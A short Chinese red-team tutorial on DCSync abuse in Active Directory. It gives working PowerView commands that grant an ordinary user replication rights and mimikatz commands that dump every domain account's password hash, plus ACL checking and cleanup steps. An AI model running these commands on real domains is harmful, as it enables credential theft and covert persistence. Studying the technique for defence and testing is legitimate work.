域渗透[DCSync]利用

一、DCSync介绍

DCSync是mimikatz的一个功能，能够模拟域控制器并从域控制器导出帐户密码hash，如果我们在域内一台主机上获得了域管理员权限，可以使用如下命令直接导出域内所有用户的hash：

默认情况下，只有和Domain Controllers和Enterprise Domain Admins权限能够使用DCSync但我们可以对，域内普通用户添加ACL实现普通用户调用DCSync导出域内所有用户的hash

DS-Replication-GetChanges(GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)和DS-Replication-Get-Changes-All(1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)

使用powerview添加ACL：https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Add-DomainObjectAcl -TargetIdentity "DC=redteam,DC=com" -PrincipalIdentity 域内普通用户 -Rights DCSync

添加成功后就可以使用该域用户dump域内所有hash：

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /all /csv" exit

通过ADfind查询yiwang用户的acl，可以看到已经添加了ACL
AdFind.exe -sc getacls -sddlfilter ;;;;;redteam/yiwang -recmute

 

删除添加的ACL：

Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity 用户用户 -Rights DCSync

 

参考链接：

https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B8%8B%E7%9A%84Access-Control-List/

https://mp.weixin.qq.com/s/mWKuJeTizlgrKrw1IcVwiw

https://www.anquanke.com/post/id/197329?display=mobile

https://www.4hou.com/posts/m7wR

https://www.anquanke.com/post/id/106949